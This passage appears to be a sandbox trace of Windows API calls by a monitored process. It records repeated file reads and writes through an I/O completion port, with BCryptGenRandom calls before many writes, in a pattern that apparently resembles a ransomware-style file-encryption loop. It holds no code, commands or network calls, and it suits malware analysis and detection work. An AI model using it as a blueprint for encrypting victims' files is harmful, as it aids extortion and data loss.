lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0162.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.549] CloseHandle (hObject=0x308) returned 1 [0162.550] free (_Block=0x3df0008) [0162.550] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.557] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x1858, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0162.564] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.572] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1c74, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.598] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.610] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.610] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0162.610] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.611] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0162.611] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.611] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.611] free (_Block=0x3e305b8) [0162.611] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.611] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.612] free (_Block=0x1fa91d0) [0162.612] free (_Block=0x1fa2ed8) [0162.612] free (_Block=0x1fa90b8) [0162.612] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0162.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.623] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.623] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0162.625] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.625] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0162.625] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.625] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.625] free (_Block=0x3e305b8) [0162.625] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.625] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.626] free (_Block=0x1fa91d0) [0162.626] free (_Block=0x1fa2ed8) [0162.626] free (_Block=0x1fa90b8) [0162.626] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0162.626] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.637] CloseHandle (hObject=0x2a4) returned 1 [0162.637] free (_Block=0x1ff1e60) [0162.637] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.640] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x16ae, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0162.641] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.770] CloseHandle (hObject=0x308) returned 1 [0162.770] free (_Block=0x3df0008) [0162.770] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.774] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0162.774] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.784] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0162.794] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.820] CloseHandle (hObject=0x308) returned 1 [0162.820] free (_Block=0x3df0008) [0162.820] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.826] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.826] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0162.826] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.827] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0162.827] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.827] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.827] free (_Block=0x3e305b8) [0162.827] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.827] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.827] free (_Block=0x1fa91d0) [0162.827] free (_Block=0x1fa2ed8) [0162.827] free (_Block=0x1fa90b8) [0162.827] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0162.828] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.831] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4e90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.832] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.842] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.842] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0162.842] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.843] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0162.843] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.843] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.843] free (_Block=0x3e305b8) [0162.843] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.843] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.844] free (_Block=0x1fa91d0) [0162.844] free (_Block=0x1fa2ed8) [0162.844] free (_Block=0x1fa90b8) [0162.844] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.844] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.864] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x28b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0162.864] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.867] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xce0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.867] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0162.868] CloseHandle (hObject=0x2a4) returned 1 [0162.868] free (_Block=0x3e70008) [0162.868] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.041] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x460, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0163.041] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.055] CloseHandle (hObject=0x338) returned 1 [0163.055] free (_Block=0x3d70450) [0163.055] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.065] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.066] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0163.066] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.066] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0163.067] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0163.067] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0163.067] free (_Block=0x3e305b8) [0163.067] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0163.067] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0163.067] free (_Block=0x1fa91d0) [0163.067] free (_Block=0x1fa2ed8) [0163.067] free (_Block=0x1fa90b8) [0163.068] WriteFile (in: hFile=0x2a4, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0163.068] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.080] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.080] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0163.081] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.081] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0163.081] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0163.081] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0163.081] free (_Block=0x3e305b8) [0163.081] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0163.081] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0163.082] free (_Block=0x1fa91d0) [0163.082] free (_Block=0x1fa2ed8) [0163.082] free (_Block=0x1fa90b8) [0163.082] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0163.082] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.093] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.094] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0163.094] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.095] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0163.095] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0163.095] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0163.095] free (_Block=0x3e305b8) [0163.095] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0163.095] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0163.095] free (_Block=0x1fa91d0) [0163.095] free (_Block=0x1fa2ed8) [0163.096] free (_Block=0x1fa90b8) [0163.096] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0163.096] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.106] CloseHandle (hObject=0x2a4) returned 1 [0163.106] free (_Block=0x3f70048) [0163.106] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.115] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x27e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0163.122] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.133] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0163.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.135] ReadFile (in: hFile=0x2a4, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x43c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0163.136] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.136] CloseHandle (hObject=0x2a4) returned 1 [0163.136] free (_Block=0x3f70048) [0163.136] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0163.191] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.191] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0163.191] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0163.191] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0163.191] free (_Block=0x3e305b8) [0163.191] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0163.191] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0163.192] free (_Block=0x1fa91d0) [0163.192] free (_Block=0x1fa2ed8) [0163.192] free (_Block=0x1fa90b8) [0163.192] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0163.192] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.192] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0163.192] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.193] CloseHandle (hObject=0x308) returned 1 [0163.193] free (_Block=0x3d70450) [0163.193] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.659] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.659] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0163.659] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.660] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0163.660] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0163.660] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0163.660] free (_Block=0x3e305b8) [0163.660] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0163.661] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0163.661] free (_Block=0x1fa91d0) [0163.661] free (_Block=0x77d7a8) [0163.661] free (_Block=0x1fa90b8) [0163.661] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0163.661] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.674] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0163.675] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.675] CloseHandle (hObject=0x2a8) returned 1 [0163.675] free (_Block=0x1ff1e60) [0163.675] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 